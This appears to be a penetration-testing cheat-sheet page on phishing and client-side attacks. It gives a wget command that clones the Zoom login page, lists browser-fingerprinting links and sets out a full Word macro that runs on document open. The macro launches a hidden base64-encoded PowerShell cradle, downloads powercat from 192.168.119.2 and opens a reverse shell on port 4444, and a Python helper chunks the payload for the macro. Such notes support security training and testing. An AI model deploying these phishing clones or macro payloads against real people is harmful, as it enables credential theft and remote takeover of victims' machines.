Phishing & Client-Side Attacks

Phishing

Cloning a Legitimate Website

# Cloning the Zoom login page
wget -E -k -K -p -e robots=off -H -Dzoom.us -nd "https://zoom.us/signin#/login"

Client-Side Attacks

Information Gathering

# Display metadata of a file
exiftool -a -u brochure.pdf

# Extract info about the victim browser and OS
https://canarytokens.com
https://grabify.link
https://github.com/fingerprintjs/fingerprintjs

Leveraging Microsoft Word Macros

# use .doc for macros instead of .docx extension
# VBA Macro to run powershell
Sub MyMacro()
  CreateObject("Wscript.Shell").Run "powershell"
End Sub

# PS cradle to download and execute powercat need to base64-encode in UTF-16LE format
IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell

# Python script used to split the base64-encoded string into smaller chunks
str = "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGUAdwA..."
n = 50
for i in range(0, len(str), n):
	print("Str = Str + " + '"' + str[i:i+n] + '"')

# The full macro invoking PowerShell to create a reverse shell
Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    
    Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
        Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
        Str = Str + "AAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwB"
    ...
        Str = Str + "QBjACAAMQA5ADIALgAxADYAOAAuADEAMQA4AC4AMgAgAC0AcAA"
        Str = Str + "gADQANAA0ADQAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsA"
        Str = Str + "A== "

    CreateObject("Wscript.Shell").Run Str
End Sub

PreviousActive Directory NextAntivirus Evasion

Last updated 1 month ago